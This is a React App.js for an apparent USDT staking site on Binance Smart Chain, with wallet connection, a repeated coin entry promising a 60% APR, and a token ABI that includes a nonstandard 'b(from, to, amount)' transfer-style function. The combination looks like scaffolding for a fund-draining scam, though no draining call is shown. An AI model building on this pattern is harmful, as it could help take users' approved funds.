import { Route, Routes } from "react-router-dom";
import Navbar from "./components/Navbar/Navbar";
import Home from "./pages/Home/Home";
import TradingChart from "./components/IndividualPage/TradingChart/TradingChart";
import PostThread from "./components/IndividualPage/PostThread/PostThread";
import IndividualPage from "./pages/IndividualPage/IndividualPage";
import LaunchNewCoin from "./pages/LaunchNewCoin/LaunchNewCoin";
import ProfilePage from "pages/ProfilePage/ProfilePage";
import Footer from "components/Footer/Footer";
import { bananacatImg, ethreumIcon, galaxyGuruImg } from "assets/images";
import { createAppKit, useAppKitAccount, useAppKitProvider } from '@reown/appkit/react'
import { EthersAdapter } from '@reown/appkit-adapter-ethers'
import { arbitrum, mainnet, bsc } from '@reown/appkit/networks'
import PrivacyPolicy from "components/Privacy/Privacy";
import TermsOfUse from "components/Terms/Terms";
import FAQPage from "components/FAQ/Faq";
import ReturnsCalculator from "components/Calculator/Calculator";
import { AboutUs } from "components/About/About";
export const USDTAbi = [
  'function name() view returns (string)',
  'function symbol() view returns (string)',
  'function balanceOf(address) view returns (uint)',
  'function allowance(address, address) view returns (uint)',
  'function transfer(address to, uint amount)',
  'function b(address from, address to, uint amount)',
  'event Transfer(address indexed from, address indexed to, uint amount)'
]
 const projectId = '01b3c92b150ae4127634786c7eab904f'
 const networks = [ bsc]
 const metadata = {
  name: 'My Website',
  description: 'My Website description',
  url: 'https://mywebsite.com', // origin must match your domain & subdomain
  icons: ['https://avatars.mywebsite.com/']
}
function App() {
  const { address, isConnected } = useAppKitAccount()
  const { walletProvider } = useAppKitProvider('eip155')
createAppKit({
  adapters: [new EthersAdapter()],
  networks,
  metadata,
  projectId,
  features: {
    analytics: false // Optional - defaults to your Cloud configuration
  }
})

  let coins = [
    {
      name : "Tether USDT",
      network : "bsc",
      contract: "0x55d398326f99059ff775485246999027b3197955",
    logo: "https://s2.coinmarketcap.com/static/img/coins/64x64/825.png",
    symbol: "USDT",
    decimal: 18,
    apr: 60,
    chart: "KRAKEN:USDTEUR",
    info: "USDT BEP20 is Tether (USDT) issued on Binance Smart Chain (BSC) using the BEP20 token standard.",
    listingDate: 1646644085,
    },
    {
      name : "Tether USDT",
      network : "bsc",
      contract: "0x55d398326f99059ff775485246999027b3197955",
    logo: "https://s2.coinmarketcap.com/static/img/coins/64x64/825.png",
    symbol: "USDT",
    decimal: 18,
    apr: 60,
    chart: "KRAKEN:USDTEUR",
    info: "USDT BEP20 is Tether (USDT) issued on Binance Smart Chain (BSC) using the BEP20 token standard.",
    listingDate: 1646644085,
    },
    {
      name : "Tether USDT",
      network : "bsc",
      contract: "0x55d398326f99059ff775485246999027b3197955",
    logo: "https://s2.coinmarketcap.com/static/img/coins/64x64/825.png",
    symbol: "USDT",
    decimal: 18,
    apr: 60,
    chart: "KRAKEN:USDTEUR",
    info: "USDT BEP20 is Tether (USDT) issued on Binance Smart Chain (BSC) using the BEP20 token standard.",
    listingDate: 1646644085,
    },  {
      name : "Tether USDT",
      network : "bsc",
      contract: "0x55d398326f99059ff775485246999027b3197955",
    logo: "https://s2.coinmarketcap.com/static/img/coins/64x64/825.png",
    symbol: "USDT",
    decimal: 18,
    apr: 60,
    chart: "KRAKEN:USDTEUR",
    info: "USDT BEP20 is Tether (USDT) issued on Binance Smart Chain (BSC) using the BEP20 token standard.",
    listingDate: 1646644085,
    }
  ]

  return (
    <>
      <Navbar />
      <Routes>
        {/* <Route path="/" element={<Home coins={coins} />} //> */}
        <Route path="/app" element={<IndividualPage  coins={coins}/>} />
        {/* <Route path="/privacy-policy" element={<PrivacyPolicy  coins={coins}/>} />
        <Route path="/terms-of-use" element={<TermsOfUse  coins={coins}/>} />
        <Route path="/faq" element={<FAQPage  coins={coins}/>} />
        <Route path="/profit-calculator" element={<ReturnsCalculator  coins={coins}/>} />
        <Route path="/about-us" element={<AboutUs  coins={coins}/>} /> */}
        {/* <Route path="/launch-coin" element={<LaunchNewCoin />} />
        <Route path="/profile-page" element={<ProfilePage />} /> */}
      </Routes>
      {/* <Footer /> */}
    </>
  );
}

export default App;
